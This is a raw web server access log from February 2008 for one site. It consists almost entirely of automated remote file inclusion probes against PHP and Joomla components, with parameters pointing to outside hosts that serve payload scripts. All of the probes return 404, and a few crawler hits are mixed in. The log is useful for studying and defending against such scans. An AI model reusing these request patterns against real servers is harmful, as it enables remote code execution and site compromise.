72.55.143.196 - - [12/Feb/2008:07:35:04 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
72.55.143.196 - - [12/Feb/2008:07:35:04 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.183.225.74 - - [12/Feb/2008:07:36:00 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.183.225.74 - - [12/Feb/2008:07:36:00 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.183.225.74 - - [12/Feb/2008:07:36:00 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:07:36:40 -0800] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:07:36:41 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:07:36:41 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.105.237 - - [12/Feb/2008:07:37:03 -0800] "GET /logs/access_071225.log/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.105.237 - - [12/Feb/2008:07:37:03 -0800] "GET /logs/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.166.166.236 - - [12/Feb/2008:07:37:52 -0800] "GET /logs/access_080108.log//modules/4nalbum/public/displaycategory.php?basepath=http://www.acb.bs.it/moodledata/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.166.166.236 - - [12/Feb/2008:07:37:52 -0800] "GET //modules/4nalbum/public/displaycategory.php?basepath=http://www.acb.bs.it/moodledata/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.166.166.236 - - [12/Feb/2008:07:37:52 -0800] "GET /logs//modules/4nalbum/public/displaycategory.php?basepath=http://www.acb.bs.it/moodledata/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:07:38:30 -0800] "GET /logs/access_080121.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.104.68 - - [12/Feb/2008:07:38:52 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:07:39:13 -0800] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:07:39:13 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:07:39:13 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.143.196 - - [12/Feb/2008:07:40:10 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.55.143.196 - - [12/Feb/2008:07:40:10 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.13.229.88 - - [12/Feb/2008:07:42:21 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
64.13.229.88 - - [12/Feb/2008:07:42:21 -0800] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cartographia.org/administrator/what/test?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.225.219.10 - - [12/Feb/2008:07:42:36 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [12/Feb/2008:07:42:36 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [12/Feb/2008:07:42:36 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.223.100 - - [12/Feb/2008:07:42:43 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/shadowad/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.193.223.100 - - [12/Feb/2008:07:42:43 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/shadowad/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.13.230.99 - - [12/Feb/2008:07:42:59 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.13.230.99 - - [12/Feb/2008:07:42:59 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:07:43:24 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.166.166.236 - - [12/Feb/2008:07:44:12 -0800] "GET /logs/access_080105.log//modules/4nalbum/public/displaycategory.php?basepath=http://www.acb.bs.it/moodledata/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:07:47:07 -0800] "GET //logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:07:47:07 -0800] "GET /logs//logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
88.218.97.19 - - [12/Feb/2008:07:48:41 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.23.236 - - [12/Feb/2008:07:49:26 -0800] "GET /minamijewelry/?D=A HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:07:49:36 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:07:49:36 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.225.219.10 - - [12/Feb/2008:07:50:25 -0800] "GET /logs/access_080130.log//modules/TotalCalendar/about.php?inc_dir=http://ia341011.us.archive.org/2/items/safe19/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.178.114.10 - - [12/Feb/2008:07:50:52 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.178.114.10 - - [12/Feb/2008:07:50:53 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.63.236.106 - - [12/Feb/2008:07:51:10 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.63.236.106 - - [12/Feb/2008:07:51:11 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.105.237 - - [12/Feb/2008:07:52:41 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [12/Feb/2008:07:53:49 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.temps4u.com/_notes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.168 - - [12/Feb/2008:07:55:34 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 33494 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
86.109.104.68 - - [12/Feb/2008:07:55:46 -0800] "GET /logs/access_080108.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.104.68 - - [12/Feb/2008:07:55:47 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.44 - - [12/Feb/2008:07:55:54 -0800] "GET /plans/?S=D HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.86.76.34 - - [12/Feb/2008:07:56:04 -0800] "GET /logs//errors.php?error=http://www.zyssetd.ch/.../test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
70.86.76.34 - - [12/Feb/2008:07:56:04 -0800] "GET //errors.php?error=http://www.zyssetd.ch/.../test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
86.109.104.68 - - [12/Feb/2008:07:57:51 -0800] "GET /logs/access_080106.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:07:58:43 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:07:58:43 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:07:58:44 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [12/Feb/2008:07:59:17 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.temps4u.com/_notes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.178.114.10 - - [12/Feb/2008:07:59:59 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.178.114.10 - - [12/Feb/2008:08:00:00 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.178.114.10 - - [12/Feb/2008:08:00:00 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.moe.go.th/bic/fileadmin/.md/lako.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.13.195.52 - - [12/Feb/2008:08:00:03 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.178.76.98 - - [12/Feb/2008:08:00:44 -0800] "GET /logs/access_080117.log/phpATM/config.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.178.76.98 - - [12/Feb/2008:08:00:46 -0800] "GET /phpATM/config.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.178.76.98 - - [12/Feb/2008:08:00:48 -0800] "GET /logs/phpATM/config.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:01:10 -0800] "GET /logs/access_080117.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:01:11 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:01:11 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.190.195.105 - - [12/Feb/2008:08:03:48 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
213.190.195.105 - - [12/Feb/2008:08:03:48 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
63.247.139.144 - - [12/Feb/2008:08:05:03 -0800] "GET /logs/access_080120.log//config.php?path_to_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [12/Feb/2008:08:05:03 -0800] "GET //config.php?path_to_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [12/Feb/2008:08:05:03 -0800] "GET /logs//config.php?path_to_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [12/Feb/2008:08:05:44 -0800] "GET /logs/access_080108.log//config.php?path_to_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:05:55 -0800] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:05:56 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:08:06:01 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.139.144 - - [12/Feb/2008:08:07:09 -0800] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [12/Feb/2008:08:07:09 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.139.144 - - [12/Feb/2008:08:07:09 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.177.159 - - [12/Feb/2008:08:10:08 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
207.58.177.159 - - [12/Feb/2008:08:10:08 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:08:11:29 -0800] "GET /logs/access_080131.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:08:11:30 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:08:11:30 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.164.74 - - [12/Feb/2008:08:11:42 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.164.74 - - [12/Feb/2008:08:11:43 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.164.74 - - [12/Feb/2008:08:11:43 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://vsfuzi.com/fuzi/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:08:12:39 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.20.67.111 - - [12/Feb/2008:08:12:51 -0800] "GET //errors.php?error=http://www.moe.go.th/bic/fileadmin/.md/ayes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.189.222.164 - - [12/Feb/2008:08:13:58 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:08:15:57 -0800] "GET /logs/access_080117.log/phpATM/config.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:08:15:58 -0800] "GET /phpATM/config.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [12/Feb/2008:08:15:58 -0800] "GET /logs/phpATM/config.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.190.195.105 - - [12/Feb/2008:08:16:25 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
213.190.195.105 - - [12/Feb/2008:08:16:25 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.obzxpl.kit.net/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
62.112.154.17 - - [12/Feb/2008:08:16:25 -0800] "GET /logs/access_080112.log//bemarket/postscript/postscript.php?p_mode=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:08:16:25 -0800] "GET /logs/access_080105.log//index.php?configFile=http://holynova.net/administrator/components/com_comprofiler/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:08:16:26 -0800] "GET //index.php?configFile=http://holynova.net/administrator/components/com_comprofiler/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:08:16:26 -0800] "GET /logs//index.php?configFile=http://holynova.net/administrator/components/com_comprofiler/safe2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:08:17:19 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:08:17:19 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:08:17:46 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:08:17:46 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.24.145 - - [12/Feb/2008:08:17:53 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:08:19:59 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.179.215 - - [12/Feb/2008:08:20:07 -0800] "GET /logs/access_070627.log HTTP/1.0" 200 163174 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.150.32.194 - - [12/Feb/2008:08:20:41 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.progressinternational.biz/contentimage/banners/bannerCrewConnect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
